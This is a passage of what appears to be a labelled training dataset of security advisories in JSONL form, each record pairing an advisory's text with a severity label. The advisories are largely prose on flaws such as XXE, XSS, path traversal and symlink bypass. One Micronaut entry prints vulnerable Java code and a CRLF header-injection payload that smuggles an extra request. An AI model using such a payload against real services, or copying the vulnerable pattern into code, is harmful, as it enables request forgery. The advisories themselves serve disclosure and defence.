HIGH]\n\nAffected versions of this crate did not clone contained strings when an interner is cloned. Interners have raw pointers to the contained strings, and they keep pointing the strings which the old interner owns, after the interner is cloned. If a new cloned interner is alive and the old original interner is dead, the new interner has dangling pointers to the old interner's storage, which is already dropped.\n\nThis allows an attacker to read the already freed memory. The dangling pointers are used by the interners to check a string is already interned. An attacker can do brute force attack to get the data pointed by the dangling pointer.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "998a0ed0ae2030554e6b", "text": "Downloads Resources over HTTP in tomita\n\nAffected versions of `tomita` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `tomita`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in tomita\n\n[Severity: HIGH]\n\nAffected versions of `tomita` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `tomita`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "55e55191b1e5e560a8e0", "text": "Downloads Resources over HTTP in dalek-browser-chrome-canary\n\nAffected versions of `dalek-browser-chrome-canary` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `dalek-browser-chrome-canary`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in dalek-browser-chrome-canary\n\n[Severity: HIGH]\n\nAffected versions of `dalek-browser-chrome-canary` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `dalek-browser-chrome-canary`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "68083e65f1f0e1cbdd32", "text": "miekg/dns parsing error leads to nil pointer dereference and DoS\n\nAn issue was discovered in `setTA` in `scan_rr.go` in the Miek Gieben DNS library before 1.0.10 for Go. A `dns.ParseZone()` parsing error causes a segmentation violation, leading to denial of service.", "text_raw": "miekg/dns parsing error leads to nil pointer dereference and DoS\n\n[Severity: HIGH]\n\nAn issue was discovered in `setTA` in `scan_rr.go` in the Miek Gieben DNS library before 1.0.10 for Go. A `dns.ParseZone()` parsing error causes a segmentation violation, leading to denial of service.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "c6138a7f6760e819eb2c", "text": "XML External Entity (XXE) Injection in Apache Solr\n\nIn Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's \"dataConfig\" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property \"enable.dih.dataConfigParam\" to true.", "text_raw": "XML External Entity (XXE) Injection in Apache Solr\n\n[Severity: HIGH]\n\nIn Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's \"dataConfig\" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property \"enable.dih.dataConfigParam\" to true.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-08-01", "split": "train"} -{"id": "e5f84d87883a13787605", "text": "RSA signature validation vulnerability on maleable encoded message in jsrsasign\n\n### Impact\nVulnerable jsrsasign will accept RSA signature with improper PKCS#1.5 padding.\nDecoded RSA signature value consists following form:\n`01(ff...(8 or more ffs)...ff)00[ASN.1 OF DigestInfo]`\nIts byte length must be the same as RSA key length, however such checking was not sufficient.\n\nTo make crafted message for practical attack is very hard.\n\n### Patches\nUsers validating RSA signature should upgrade to 10.2.0 or later.\n\n### Workarounds\nThere is no workaround. Not to use RSA signature validation in jsrsasign.\n\n### ACKNOWLEDGEMENT\nThanks to Daniel Yahyazadeh @yahyazadeh for reporting and analyzing this vulnerability.", "text_raw": "RSA signature validation vulnerability on maleable encoded message in jsrsasign\n\n[Severity: CRITICAL]\n\n### Impact\nVulnerable jsrsasign will accept RSA signature with improper PKCS#1.5 padding.\nDecoded RSA signature value consists following form:\n`01(ff...(8 or more ffs)...ff)00[ASN.1 OF DigestInfo]`\nIts byte length must be the same as RSA key length, however such checking was not sufficient.\n\nTo make crafted message for practical attack is very hard.\n\n### Patches\nUsers validating RSA signature should upgrade to 10.2.0 or later.\n\n### Workarounds\nThere is no workaround. Not to use RSA signature validation in jsrsasign.\n\n### ACKNOWLEDGEMENT\nThanks to Daniel Yahyazadeh @yahyazadeh for reporting and analyzing this vulnerability.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-16", "split": "train"} -{"id": "9bd35b94950b6d82f824", "text": "Micronaut's HTTP client is vulnerable to HTTP Request Header Injection\n\n### Vulnerability\n\nMicronaut's HTTP client is vulnerable to \"HTTP Request Header Injection\" due to not validating request headers passed to the client.\n\nExample of vulnerable code:\n\n```java\n@Controller(\"/hello\")\npublic class HelloController {\n\n@Inject\n @Client(\"/\")\n RxHttpClient client;\n\n@Get(\"/external-exploit\")\n @Produces(MediaType.TEXT_PLAIN)\n public String externalExploit(@QueryValue(\"header-value\") String headerValue) {\n return client.toBlocking().retrieve(\n HttpRequest.GET(\"/hello\")\n .header(\"Test\", headerValue)\n );\n }\n}\n```\n\nIn the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated.\n\nFor example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.\n\n```java\nList headerData = List.of(\n \"Connection: Keep-Alive\", // This keeps the connection open so another request can be stuffed in.\n \"\",\n \"\",\n \"POST /hello/super-secret HTTP/1.1\",\n \"Host: 127.0.0.1\",\n \"Content-Length: 31\",\n \"\",\n \"{\\\"new\\\":\\\"json\\\",\\\"content\\\":\\\"here\\\"}\",\n \"\",\n \"\"\n);\nString headerValue = \"H\\r\\n\" + String.join(\"\\r\\n\", headerData);;\nURI theURI =\n UriBuilder\n .of(\"/hello/external-exploit\")\n .queryParam(\"header-value\", headerValue) // Automatically URL encodes data\n .build();\nHttpRequest request = HttpRequest.GET(theURI);\nString body = client.toBlocking().retrieve(request);\n```\n\nNote that using `@HeaderValue` instead of `@QueryValue` is not vulnerable since Micronaut's HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.).\n\n### Impact\n\nThe attacker is able to control the entirety of the HTTP body for their custom requests.\nAs such, this vulnerability enables attackers to perform a variant of [Server Side Request Forgery](https://cwe.mitre.org/data/definitions/918.html).\n\n### Patches\n\nThe problem has been patched in the `micronaut-http-client` versions 1.2.11 and 1.3.2 and above.\n\n### Workarounds\n\nDo not pass user data directly received from HTTP request parameters as headers in the HTTP client.\n\n### References\n\nFix commits\n- https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1\n- https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d\n- https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [micronaut-core](https://github.com/micronaut-projects/micronaut-core)\n* Email us at [info@micronaut.io](mailto:info@micronaut.io)\n\n### Credit\n\nOriginally reported by @JLLeitschuh", "text_raw": "Micronaut's HTTP client is vulnerable to HTTP Request Header Injection\n\n[Severity: CRITICAL]\n\n### Vulnerability\n\nMicronaut's HTTP client is vulnerable to \"HTTP Request Header Injection\" due to not validating request headers passed to the client.\n\nExample of vulnerable code:\n\n```java\n@Controller(\"/hello\")\npublic class HelloController {\n\n @Inject\n @Client(\"/\")\n RxHttpClient client;\n\n @Get(\"/external-exploit\")\n @Produces(MediaType.TEXT_PLAIN)\n public String externalExploit(@QueryValue(\"header-value\") String headerValue) {\n return client.toBlocking().retrieve(\n HttpRequest.GET(\"/hello\")\n .header(\"Test\", headerValue)\n );\n }\n}\n```\n\nIn the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated.\n\nFor example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.\n\n```java\nList headerData = List.of(\n \"Connection: Keep-Alive\", // This keeps the connection open so another request can be stuffed in.\n \"\",\n \"\",\n \"POST /hello/super-secret HTTP/1.1\",\n \"Host: 127.0.0.1\",\n \"Content-Length: 31\",\n \"\",\n \"{\\\"new\\\":\\\"json\\\",\\\"content\\\":\\\"here\\\"}\",\n \"\",\n \"\"\n);\nString headerValue = \"H\\r\\n\" + String.join(\"\\r\\n\", headerData);;\nURI theURI =\n UriBuilder\n .of(\"/hello/external-exploit\")\n .queryParam(\"header-value\", headerValue) // Automatically URL encodes data\n .build();\nHttpRequest request = HttpRequest.GET(theURI);\nString body = client.toBlocking().retrieve(request);\n```\n\nNote that using `@HeaderValue` instead of `@QueryValue` is not vulnerable since Micronaut's HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.).\n\n### Impact\n\nThe attacker is able to control the entirety of the HTTP body for their custom requests.\nAs such, this vulnerability enables attackers to perform a variant of [Server Side Request Forgery](https://cwe.mitre.org/data/definitions/918.html).\n\n### Patches\n\nThe problem has been patched in the `micronaut-http-client` versions 1.2.11 and 1.3.2 and above.\n\n### Workarounds\n\nDo not pass user data directly received from HTTP request parameters as headers in the HTTP client.\n\n### References\n\nFix commits\n- https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1\n- https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d\n- https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [micronaut-core](https://github.com/micronaut-projects/micronaut-core)\n* Email us at [info@micronaut.io](mailto:info@micronaut.io)\n\n### Credit\n\nOriginally reported by @JLLeitschuh \n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-03-30", "split": "train"} -{"id": "1bb91ec8de7578e41d24", "text": "Path Traversal in public\n\nVersions of `public` before 0.1.3 are vulnerable to path traversal. This is due to lack of file path sanitization which could lead to any file the parent process has access to on the server to be read by malicious user.\n\n## Recommendation\n\nUpdate to version 0.1.3 or later.", "text_raw": "Path Traversal in public\n\n[Severity: HIGH]\n\nVersions of `public` before 0.1.3 are vulnerable to path traversal. This is due to lack of file path sanitization which could lead to any file the parent process has access to on the server to be read by malicious user.\n\n\n## Recommendation\n\nUpdate to version 0.1.3 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-18", "split": "train"} -{"id": "dbfe23fd19161d9a4886", "text": "Excessive memory allocation\n\nIn version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit (8192 bytes) above which the WebSocket gets an HTTP response with the 413 status code and the connection gets closed.", "text_raw": "Excessive memory allocation\n\n[Severity: MEDIUM]\n\nIn version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit (8192 bytes) above which the WebSocket gets an HTTP response with the 413 status code and the connection gets closed.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "958fcd392ba70538dad3", "text": "Cross-Site Scripting in serialize-javascript\n\nVersions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "text_raw": "Cross-Site Scripting in serialize-javascript\n\n[Severity: MEDIUM]\n\nVersions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-05", "split": "train"} -{"id": "6e698829e1c5a1cd2ffd", "text": "Cross-site scripting in sickrage\n\nIn SiCKRAGE, versions 9.3.54.dev1 to 10.0.11.dev1 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly in the `quicksearch` feature. Therefore, an attacker can steal a user's sessionID to masquerade as a victim user, to carry out any actions in the context of the user.", "text_raw": "Cross-site scripting in sickrage\n\n[Severity: MEDIUM]\n\nIn SiCKRAGE, versions 9.3.54.dev1 to 10.0.11.dev1 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly in the `quicksearch` feature. Therefore, an attacker can steal a user's sessionID to masquerade as a victim user, to carry out any actions in the context of the user.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-20", "split": "train"} -{"id": "ba981a2d1d62db74aef6", "text": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak", "text_raw": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2018-07-17", "split": "train"} -{"id": "01b7d56292c9248e1b4f", "text": "OS Command Injection in bikeshed\n\nThis affects the package bikeshed before 3.0.0. This can occur when an untrusted source file containing Inline Tag Command metadata is processed. When an arbitrary OS command is executed, the command output would be included in the HTML output.", "text_raw": "OS Command Injection in bikeshed\n\n[Severity: HIGH]\n\nThis affects the package bikeshed before 3.0.0. This can occur when an untrusted source file containing Inline Tag Command metadata is processed. When an arbitrary OS command is executed, the command output would be included in the HTML output.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "cec3e9a84aafe2fcf2e4", "text": "LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC", "text_raw": "LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2010-08-28", "split": "train"} -{"id": "e76477f943dba452383a", "text": "Out-of-bounds Write in OpenCV\n\nAn exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0 (corresponds with OpenCV-Python 4.1.0.25). A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.", "text_raw": "Out-of-bounds Write in OpenCV\n\n[Severity: HIGH]\n\nAn exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0 (corresponds with OpenCV-Python 4.1.0.25). A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "74849b271977b525e94b", "text": "Denial of Service in SheetsJS Pro\n\nSheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 2 of 2).", "text_raw": "Denial of Service in SheetsJS Pro\n\n[Severity: MEDIUM]\n\nSheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 2 of 2).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-22", "split": "train"} -{"id": "3f8935a2a4e0814ef6e9", "text": "Ansible fails to properly mark lookup-plugin results as unsafe\n\nAnsible before versions 2.1.6.0, 2.2.3.0, 2.3.1.0, and 2.4.0.0 fails to properly mark lookup-plugin results as unsafe. If an attacker could control the results of lookup() calls, they could inject Unicode strings to be parsed by the jinja2 templating system, resulting in code execution. By default, the jinja2 templating language is now marked as 'unsafe' and is not evaluated.", "text_raw": "Ansible fails to properly mark lookup-plugin results as unsafe\n\n[Severity: CRITICAL]\n\nAnsible before versions 2.1.6.0, 2.2.3.0, 2.3.1.0, and 2.4.0.0 fails to properly mark lookup-plugin results as unsafe. If an attacker could control the results of lookup() calls, they could inject Unicode strings to be parsed by the jinja2 templating system, resulting in code execution. By default, the jinja2 templating language is now marked as 'unsafe' and is not evaluated.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-09-06", "split": "train"} -{"id": "b3be4d8cb66c3690df6f", "text": "Special Element Injection in notebook\n\n### Impact\n\nUntrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.\n\n### Patches\n\n5.7.11, 6.4.1\n\n### References\n\n[OWASP Page on Injection Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules)\n\n### For more information\n\nIf you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.\n\nCredit: Guillaume Jeanne from Google\n\n### Example:\n\nA notebook with the following content in a cell and it would display an alert when opened for the first time in Notebook (in an untrusted state):\n\n```\n{ \"cell_type\": \"code\", \"execution_count\": 0, \"metadata\": {}, \"outputs\": [ { \"data\": { \"text/html\": [ \"\\n\"], \"text/plain\": [] }, \"metadata\": {}, \"output_type\": \"display_data\" } ], \"source\": [ \"\" ] }\n````", "text_raw": "Special Element Injection in notebook\n\n[Severity: HIGH]\n\n### Impact\n\nUntrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.\n\n### Patches\n\n5.7.11, 6.4.1\n\n### References\n\n[OWASP Page on Injection Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules)\n\n### For more information\n\nIf you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.\n\nCredit: Guillaume Jeanne from Google\n\n\n### Example:\n\nA notebook with the following content in a cell and it would display an alert when opened for the first time in Notebook (in an untrusted state):\n\n```\n{ \"cell_type\": \"code\", \"execution_count\": 0, \"metadata\": {}, \"outputs\": [ { \"data\": { \"text/html\": [ \"\\n\"], \"text/plain\": [] }, \"metadata\": {}, \"output_type\": \"display_data\" } ], \"source\": [ \"\" ] }\n````", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "16a38897645785b50d28", "text": "dom4j allows External Entities by default which might enable XXE attacks\n\ndom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.\n\nNote: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended.", "text_raw": "dom4j allows External Entities by default which might enable XXE attacks\n\n[Severity: CRITICAL]\n\ndom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.\n\nNote: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-06-05", "split": "train"} -{"id": "7717ff9fa1d48747eb09", "text": "tlslite-ng off-by-one error on mac checking\n\ntlslite-ng version 0.7.3 and earlier, since commit [d7b288316bca7bcdd082e6ccff5491e241305233](https://github.com/tlsfuzzer/tlslite-ng/commit/d7b288316bca7bcdd082e6ccff5491e241305233) contains a CWE-354: Improper Validation of Integrity Check Value vulnerability in TLS implementation, `tlslite/utils/constanttime.py`: `ct_check_cbc_mac_and_pad()`; line `end_pos = data_len - 1 - mac.digest_size` that can result in an attacker manipulating the TLS ciphertext which will not be detected by receiving tlslite-ng. This attack appears to be exploitable via man in the middle on a network connection. This vulnerability appears to have been fixed after commit [3674815d1b0f7484454995e2737a352e0a6a93d8](https://github.com/tlsfuzzer/tlslite-ng/pull/234/commits/3674815d1b0f7484454995e2737a352e0a6a93d8).", "text_raw": "tlslite-ng off-by-one error on mac checking\n\n[Severity: HIGH]\n\ntlslite-ng version 0.7.3 and earlier, since commit [d7b288316bca7bcdd082e6ccff5491e241305233](https://github.com/tlsfuzzer/tlslite-ng/commit/d7b288316bca7bcdd082e6ccff5491e241305233) contains a CWE-354: Improper Validation of Integrity Check Value vulnerability in TLS implementation, `tlslite/utils/constanttime.py`: `ct_check_cbc_mac_and_pad()`; line `end_pos = data_len - 1 - mac.digest_size` that can result in an attacker manipulating the TLS ciphertext which will not be detected by receiving tlslite-ng. This attack appears to be exploitable via man in the middle on a network connection. This vulnerability appears to have been fixed after commit [3674815d1b0f7484454995e2737a352e0a6a93d8](https://github.com/tlsfuzzer/tlslite-ng/pull/234/commits/3674815d1b0f7484454995e2737a352e0a6a93d8).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-12", "split": "train"} -{"id": "650166b697ce2fdc1f45", "text": "ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness", "text_raw": "ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2016-08-31", "split": "train"} -{"id": "8615252a124f0f0dfec3", "text": "Malicious password-reset in Akaunting\n\nAkaunting version 2.1.12 and earlier suffers from a password reset spoofing vulnerability, wherein an attacker can proxy password reset requests through a running Akaunting instance, if that attacker knows the target's e-mail address. This issue was fixed in version 2.1.13 of the product. Please note that this issue is ultimately caused by the defaults provided by the Laravel framework, specifically how proxy headers are handled with respect to multi-tenant implementations. In other words, while this is not technically a vulnerability in Laravel, this default configuration is very likely to lead to practically identical identical vulnerabilities in Laravel projects that implement multi-tenant applications.", "text_raw": "Malicious password-reset in Akaunting\n\n[Severity: HIGH]\n\nAkaunting version 2.1.12 and earlier suffers from a password reset spoofing vulnerability, wherein an attacker can proxy password reset requests through a running Akaunting instance, if that attacker knows the target's e-mail address. This issue was fixed in version 2.1.13 of the product. Please note that this issue is ultimately caused by the defaults provided by the Laravel framework, specifically how proxy headers are handled with respect to multi-tenant implementations. In other words, while this is not technically a vulnerability in Laravel, this default configuration is very likely to lead to practically identical identical vulnerabilities in Laravel projects that implement multi-tenant applications.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "61bd62653ab735c575be", "text": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links\n\n### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.\n\nThese issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n4.4.16 || 5.0.8 || 6.1.7\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n filter: (file, entry) => {\n if (entry.type === 'SymbolicLink') {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.\n\n### Fix\n\nThe problem is addressed in the following ways:\n\n1. All paths are normalized to use `/` as a path separator, replacing `\\` with `/` on Windows systems, and leaving `\\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.\n2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.\n\n#### Caveat\n\nNote that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.\n\nUsers are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.", "text_raw": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links\n\n[Severity: HIGH]\n\n### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. \n\nThese issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n4.4.16 || 5.0.8 || 6.1.7\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n filter: (file, entry) => {\n if (entry.type === 'SymbolicLink') {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.\n\n### Fix\n\nThe problem is addressed in the following ways:\n\n1. All paths are normalized to use `/` as a path separator, replacing `\\` with `/` on Windows systems, and leaving `\\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.\n2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.\n\n#### Caveat\n\nNote that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.\n\nUsers are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-31", "split": "train"} -{"id": "3b7370a0e78444aba26a", "text": "Uncontrolled Resource Consumption in fastify-multipart\n\nPrototype pollution vulnerability in `fastify-multipart` < 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.", "text_raw": "Uncontrolled Resource Consumption in fastify-multipart\n\n[Severity: MEDIUM]\n\nPrototype pollution 